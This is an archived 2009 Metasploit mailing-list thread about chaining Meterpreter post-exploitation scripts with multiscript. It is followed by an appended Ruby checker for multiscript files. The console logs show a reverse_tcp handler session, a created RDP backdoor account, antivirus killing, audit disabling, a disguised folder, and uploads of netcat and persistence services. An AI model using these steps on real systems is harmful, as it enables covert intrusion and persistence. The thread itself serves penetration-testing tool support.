Metasploit mailing list archives

multihandler rc :?


From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Fri, 2 Oct 2009 07:06:55 -0400

I think you might be confusing the function of multiscript with a resource file
for Meterpreter. multiscript is for chaining several Meterpreter scripts
together, either by giving the list with options through the command line or in
a text file, for example:
 run multiscript -c "winenum;getgui -e -u support3889 -p P@ssw0rd"

----script file postscript.txt----
winenum
getgui -e -u support3889 -p P@ssw0rd
---end of script file----
run multiscript -s /tmp/postscript.txt

I see you are trying to upload a toolkit to the target. You can make an
auto-expanding executable and use the uploadexec script to upload the toolkit and
run it, extracting to your desired folder.
Do not put "run" in front of the name of each script, and remove the commands
from it; you can write a custom script for those commands and invoke it from
the multiscript. I changed the message it returns when executing a script
from "command" to "script" to reduce any confusion about what it does.
carlos@loki:~/svn/msf3-dev$ ./msfconsole

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf > cat /tmp/samplescript
[*] exec: cat /tmp/samplescript

winenum
getgui -e -u dark -p P@ssword
getcountermeasures -k -d

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set AutoRunScript multiscript -s /tmp/samplescript
AutoRunScript => multiscript -s /tmp/samplescript
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) > [*] Started reverse handler

[*] Starting the payload handler...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.171:1143)
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running script winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.1.171:1143...
[*] Saving report to
/home/carlos/.msf3/logs/winenum/192.168.1.171_20091002.0006-69795/192.168.1.171_20091002.0006-69795.txt
[*] Checking if WIN2K3LAB01 is a Virtual Machine ........
[*]     This is a VMware Workstation/Fusion Virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -nao
[*]     running command netstat -vb
[*]     running command netstat -ns
[*]     running command net accounts
[*]     running command net accounts /domain
[*]     running command net session
[*]     running command net share
[*]     running command net group
[*]     running command net user
[*]     running command net localgroup
[*]     running command net localgroup administrators
[*]     running command net group administrators
[*]     running command net view /domain
[*]     running command netsh firewall show config
[*]     running command tasklist /svc
[*]     running command tasklist /m
[*]     running command gpresult /SCOPE COMPUTER /Z
..........................................
[*]     running script getgui -e -u dark -p P@ssword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez at darkoperator.com
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*]     running script getcountermeasures -k -d
.........................................


On Fri, Oct 2, 2009 at 5:06 AM, netevil <netevil at hackers.it> wrote:

Carlos Perez wrote:

Fixed in SVN give it a try


Hi Carlos, updated and tried again...
but execution ends in half a second with the following on the console...
and no results....

David

[*] Exploit running as background job.
[*] Starting the payload handler...
[*] Started reverse handler
msf exploit(handler) > [*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.253.128.106:8080 -> 192.253.128.103:1219)
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running command run disable_audit.rb
[*]     running command run migrate.rb
[*]     running command run killav.rb
[*]     running command run winenum.rb
[*]     running command run scraper.rb
[*]     running command cd c:\
[*]     running command mkdir ..-
[*]     running command cd ..-
[*]     running command mkdir giftbag
[*]     running command cd giftbag
[*]     running command upload /pentest/giftbag/psexec.exe psexec.exe
[*]     running command upload /pentest/giftbag/nc.exe nc.exe
[*]     running command upload /pentest/giftbag/metsrv.dll metsrv.dll
[*]     running command upload /pentest/giftbag/metsvc.exe metsvc.exe
[*]     running command upload /pentest/giftbag/metsvc-server.exe metsvc-server.exe
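The two input forms Carlos describes (a semicolon-separated list after -c, or one entry per line in a file passed with -s) and the mistake in the quoted report (a leading "run", console commands mixed into the list) are easy to check before handing the file to multiscript. The Ruby below is an added example, not multiscript's own code from the Metasploit tree: the splitting rules, the NON_SCRIPT_COMMANDS word list, the Entry struct and the sample files are all assumptions made for illustration, based only on the behaviour the thread describes.

```ruby
# Added example (not Metasploit's own multiscript implementation): parse the two
# multiscript input forms from the thread and flag entries that are not scripts.
#   -c "winenum;getgui -e -u user -p pass"   -> semicolon-separated list
#   -s /path/to/file                         -> one entry per line
# Splitting rules and the command word list are assumptions for this example.

# Meterpreter console commands that are not scripts (constructed list).
NON_SCRIPT_COMMANDS = %w[cd mkdir upload download ls pwd shell execute].freeze

# Parse a -c style argument: entries separated by ';', surrounding space stripped.
def parse_inline_list(arg)
  arg.split(';').map(&:strip).reject(&:empty?)
end

# Parse -s file contents: one entry per line, blank lines and '#' comments dropped.
def parse_script_file(text)
  text.each_line.map(&:strip).reject { |l| l.empty? || l.start_with?('#') }
end

# One list entry: script name, its option words, and any problems found.
Entry = Struct.new(:script, :opts, :warnings)

# Apply the rules from the thread: no leading "run", no console commands,
# scripts are named without a .rb extension.
def check_entry(line)
  warnings = []
  words = line.split
  if words.first == 'run'
    warnings << 'leading "run" is not needed; multiscript already runs each script'
    words.shift
  end
  name = words.first.to_s
  if NON_SCRIPT_COMMANDS.include?(name)
    warnings << "\"#{name}\" is a console command, not a script; move it into a custom script"
  end
  if name.end_with?('.rb')
    warnings << 'drop the .rb extension; scripts are referenced by bare name'
    name = name.sub(/\.rb\z/, '')
  end
  Entry.new(name, words.drop(1), warnings)
end

def check_list(entries)
  entries.map { |e| check_entry(e) }
end

# Constructed samples: the layout from the quoted report, and a correct file.
BAD_FILE = <<~TXT
  run winenum.rb
  cd c:\\
  upload /pentest/giftbag/nc.exe nc.exe
TXT

GOOD_FILE = <<~TXT
  winenum
  getgui -e -u support3889 -p P@ssw0rd
TXT

if __FILE__ == $PROGRAM_NAME
  check_list(parse_script_file(BAD_FILE)).each do |e|
    puts "#{e.script}: #{e.warnings.empty? ? 'ok' : e.warnings.join('; ')}"
  end
end
```

Running it over BAD_FILE reports the three problems the thread points out, while GOOD_FILE passes cleanly; the same check_list call works on parse_inline_list output for the -c form.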
